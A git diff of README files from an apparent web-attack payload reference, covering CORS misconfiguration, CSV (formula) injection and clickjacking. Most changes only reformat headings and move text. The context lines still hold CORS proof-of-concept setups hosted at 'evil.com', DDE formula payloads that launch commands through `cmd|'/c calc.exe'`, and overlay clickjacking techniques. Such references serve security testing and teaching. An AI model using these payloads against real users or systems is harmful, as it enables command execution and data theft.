diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index c6d5b87..7ca76b3 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -54,7 +54,7 @@ Access-Control-Allow-Credentials: true {"[private API key]"} ``` -#### Proof of concept +#### Proof Of Concept This PoC requires that the respective JS script is hosted at `evil.com` @@ -118,7 +118,7 @@ Access-Control-Allow-Credentials: true {"[private API key]"} ``` -#### Proof of concept +#### Proof Of Concept This can be exploited by putting the attack code into an iframe using the data URI scheme. If the data URI scheme is used, the browser will use the `null` @@ -175,7 +175,7 @@ Access-Control-Allow-Origin: * {"[private API key]"} ``` -#### Proof of concept +#### Proof Of Concept ```js var req = new XMLHttpRequest(); @@ -210,7 +210,7 @@ Access-Control-Allow-Credentials: true ``` -#### Proof of concept (Example 1) +#### Proof of Concept (Example 1) This PoC requires the respective JS script to be hosted at `evilexample.com` diff --git a/CSV Injection/README.md b/CSV Injection/README.md index eb856d9..d29b155 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -11,6 +11,16 @@ ## Methodology +CSV Injection, also known as Formula Injection, is a security vulnerability that occurs when untrusted input is included in a CSV file. Any formula can be started with: + +```powershell += ++ +– +@ +``` + + Basic exploits with **Dynamic Data Exchange**. * Spawn a calc @@ -30,7 +40,6 @@ Basic exploits with **Dynamic Data Exchange**. ```powershell =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A - +thespanishinquisition(cmd|'/c calc.exe'!A = cmd|'/c calc.exe'!A ``` @@ -52,16 +61,6 @@ Technical details of the above payloads: - `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data -Any formula can be started with - -```powershell -= -+ -– -@ -``` - - ## References - [CSV Excel Macro Injection - Timo Goosen, Albinowax - Jun 21, 2022](https://owasp.org/www-community/attacks/CSV_Injection) diff --git a/Clickjacking/README.md b/Clickjacking/README.md index 43780cb..45c85e9 100644 --- a/Clickjacking/README.md +++ b/Clickjacking/README.md @@ -42,6 +42,7 @@ the attacker can trick the user into interacting with the hidden content, believ * Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it. * Misleading User Interaction: The attacker places deceptive elements within the transparent container, such as fake buttons, links, or forms. These elements perform actions when clicked, but the user is unaware of their presence due to the overlaying transparent UI element. * User Interaction: When the user interacts with the visible interface, they are unknowingly interacting with the hidden elements due to the transparent overlay. This interaction can lead to unintended actions or unauthorized operations. + ```html